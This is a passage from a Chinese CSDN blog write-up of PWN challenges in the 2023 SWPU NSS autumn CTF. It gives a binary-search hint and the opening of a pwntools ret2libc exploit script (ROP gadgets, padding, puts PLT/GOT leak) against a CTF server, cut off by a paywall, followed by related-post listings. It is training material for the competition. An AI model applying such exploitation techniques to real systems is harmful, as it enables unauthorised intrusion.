2023年SWPU NSS 秋季招新赛 (校外赛道) PWN 题解

最新推荐文章于 2024-06-25 09:29:06 发布
最新推荐文章于 2024-06-25 09:29:06 发布
阅读量286 收藏 1
点赞数 2
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77205899/article/details/134008536
版权
本文展示了几个编程和技术挑战中的漏洞利用方法,包括整数溢出攻击、利用ROPgadget获取puts地址、执行system调用以及编写和使用shellcode。内容涉及远程连接、ELF文件、libc库和python3脚本在安全竞赛中的应用。
摘要由CSDN通过智能技术生成
0x1.guess me

简单猜数字 不用脚本 先输入50 如果大了就再输入25小了就75 以此类推

0x2.签到 自己签到吧
0x3.ezlibc

from pwn import *
io=remote('node4.anna.nssctf.cn',28843)
elf=ELF('./lit/pwn4')
libc=ELF('./lit/libc-2.31.so')
context(arch='amd64', os='linux', log_level='debug')
ret=0x400556
rdi=0x4007d3

main=elf.sym['main']

Padding = b'\x00' + b'A' * (0x60 - 0x01 + 0x08)

#ROPgadget --binary file_name --only "pop|ret"
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
最低0.47元/天 解锁文章
盼一_
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
SWPU 2021团队程序设计天梯选拔 题解
繁凡さん的博客
03-21 2442
补题场链接:https://pintia.cn/problem-sets/1373141720280027136 本次选拔除后三题以外,其余的题目难度都不是很大,简单筛选一下大家的基础。请大家这段时间加油刷题,好好准备 4月24日 的天梯。 L1-1 买不起的肥宅水 Solution 直接算即可,因为瓶数一定是整数所以取整。 Code #include <bits/stdc++.h> using namespace std; typedef pair<int, int> P
2023SWPU NSS 秋季招新赛 PWN
Xzzzz911的博客
10-20 611
西南石油大学举办的一场新生,总体来说举办的不错,支持支持,明再来!!!这次比总体不错,RE和CRYPTO都做了些,可惜的就是PWN没有ak,暴露出了自己的弱点,还是要慢慢沉淀,对汇编还真的不是很熟,加油吧,冲冲冲!!!
[SWPUCTF 2023 秋季新生]签到base值得拥有
个人做题记录,大佬勿喷
01-23 416
很明显的base64多次加密。代码如下:(看大佬们的)
2023SWPU NSS 秋季招新赛 (校外赛道)-没做出来的writeup
书山有路勤为径,学海无涯苦作舟
06-25 955
第一个点,就是绕过第二个if,这里直接变量覆盖即可,当然GET和POST都发送wq是不行的,在POST中发送pucky即可。在进入unserialize之后,__wakeup()会进行赋值,如果molly===yuki那么即可得到flag。看来我们需要让wq等于二仙桥来进入第一个if语句,然后再绕过第二个if语句,进行反序列化。然后在反序列化的时候采取引用绕过的方式,exp如下。这题没啥可说了,反序列化之前也专门练过了。hint有提示备份文件,直接访问。看这个大佬的手工注入,nb呀。这个 dll 文件中。
[SWPUCTF 2023 秋季新生] web题解
rev1ve的博客
10-21 1986
然后就是上传的时候有两个if语句,第一个成立,第二个不成立。由于GET和POST传同一个参数没有先后顺序,所以不能用下面的方式去实现变量覆盖。分析一下,MD5和sha1都可以用数组绕过,然后用php伪协议中的data协议。分析一下,首先是参数名利用php解析特性;强等于,但是__wakeup方法会赋值,所以采取引用绕过的方式,exp如下。我们可以bp抓包,依次再三个参数fuzz测试(在页面处输入不了。考点:源码泄露,变量引用绕过__wakeup,php变量覆盖。打开题目,先试试普通一句话木马,发现被检测。
2023SWPU NSS 秋季招新赛 CTF Reverse‘方向WP详解
Sciurdae的博客
10-20 1140
无壳64bit文件,,ida64分析标准的base64,
2023SWPU NSS 秋季招新赛
10-18
2023SWPU NSS2023SWPU NSS2023SWPU NSS秋季招新赛是指西南石油大学网络安全协会(NSS)在2023秋季举办的招新赛NSS是一个由热爱网络安全的学生自发组织的团队,旨在提高学生的网络安全意识和技能。招新赛...
PwnSWPUCTF_2019_login
Nothing
12-09 1187
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
09-06
关于sql注入
[SWPUCTF 2023 秋季新生]字节码
lzx13290757580的博客
04-06 136
计算出来的结果转换为对应的 ASCII 字符。老规矩:AI+逆向出flag。
【Web】SWPUCTF 2023 秋季新生 个人复现
uuzeray的博客
11-17 590
复现套新题试试
攻防世界 pwn新手区 wp
Gtooler的博客
10-07 469
get-shell 此题是经典入门题,没有设置任何漏洞,直接给了shell 直接nc连上,然后ls,最后cat flag即可 hello_pwn 发现只要让dword_60106C == 1853186401就可以拿到flag read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存 计算距离为4,写个exp即可 from pwn import * p = remote('111.200.241.244', '56851') p.recvu
BUUCTF ez_pz_hackover_2016[动态调试之初入门]
weixin_45441024的博客
01-26 550
BUUCTF ez_pz_hackover_2016[动态调试之初入门] 之前做题基本上都是放到IDA里面进行分析,所以在动态调试这方面一直有所欠缺,今天这道题就弥补了这个不足,真正地走进了栈题的动态调试 先check一下,发现什么保护都没有开,还是一个32位的程序,心里不免有些小激动,难道这题简单? 不管简单与否,我们都先运行一下,发现在输入之前回显给我们一个栈地址,并且这个地址不是固定的,所以这里一定会用到,拿小本本记下来,之后程序会将我们输入的东西打印出来 之后我们进到IDA来分析一下这个程序
基于spring boot 的流浪动物管理系统毕业论文.docx
09-09
基于spring boot 的流浪动物管理系统毕业论文.docx
C语言经典算法100例 - 快捷方式.lnk
09-09
C语言经典算法100例 - 快捷方式.lnk
基于ssm的化妆品配方及工艺管理系统的设计与实现.docx
最新发布
09-09
基于ssm的化妆品配方及工艺管理系统的设计与实现.docx
电子设计项目毕业设计论文正弦信号发生器示列资料
09-09
本资源只包含论文文档,电子设计项目毕业设计论文文档正弦信号发生器示列资料提取方式是百度网盘分享地址
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

盼一_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值